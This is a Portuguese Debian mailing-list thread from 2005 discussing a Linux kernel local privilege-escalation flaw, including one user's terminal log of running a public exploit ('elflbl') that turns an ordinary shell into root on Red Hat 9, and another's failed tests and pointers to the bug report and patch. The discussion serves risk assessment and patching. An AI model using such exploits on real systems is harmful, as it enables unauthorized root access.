Eu acredito ter fundamento, em todas as distros red hat like que testei foi
validado o exploit disponível na net, com um usuário comum logado em um
shell, o exploit foi compilado e executado com sucesso:
[EMAIL PROTECTED] marcio]$ id
uid=500(marcio) gid=500(marcio) groups=500(marcio)
[EMAIL PROTECTED] marcio]$ ./elflbl
[+] SLAB cleanup
child 1 VMAs 65527
child 2 VMAs 65527
child 3 VMAs 1430
[+] moved stack bfffd000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcf400000 - 0xde564000
Wait... |
[+] race won maps=43238
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd00fd000
[+] gate modified ( 0xffec9088 0x0804ec00 )
[+] exploited, uid=0
sh-2.05b# id
uid=0(root) gid=0(root) groups=500(marcio)
Este foi testado em um rh9, com kernel 2.4.26 (minha workstation), e em
outros sistemas tbm funcionou. só não cheguei a testar em algum debian que
tenho instalado (muitos são PCs de produção). Acrdito aue todos devemos nos
atentar as próximas correções, assim como quando o problema foi o ptrace.
Márcio Oliveira
----- Original Message -----
From: "André Carezia" <[EMAIL PROTECTED]>
To: "grupo Debian" <debian-user-portuguese@lists.debian.org>
Sent: Friday, January 14, 2005 11:03 PM
Subject: Re: Aumenta risco de vulnerabilidade do Linux
Carlucio Lopes wrote:
Pessoal,
isto aqui tem fundamento ou eh mais uma sacanagem de marketing?
Existe uma falha publicada e um relatório de erro foi aberto no Debian:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=289202
Mas, aparentemente, o programa-exemplo que foi liberado por Paul Starzetz
não funciona na versão 2.4.18 do núcleo:
http://marc.theaimsgroup.com/?l=debian-security&m=110543596303930&w=2
http://marc.theaimsgroup.com/?l=debian-security&m=110548035007510&w=2
Fiz o mesmo teste, e não funciona.
Também testei com a versão 2.4.27, rodando em Debian 3.0. Não funciona.
E testei, finalmente, com a versão 2.6.8 rodando em Debian 3.1. Nesse caso
o máquina fica com 100% de uso da CPU e pára de responder em cerca de 10
minutos.
O pacote Debian da versão 2.4.27, com correções do Marcelo, está pronto,
ao que parece. Mas não está disponível ainda na distribuição "unstable".
--
André Carezia
Eng. de Telecomunicações
Carezia Consultoria - www.carezia.eng.br
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]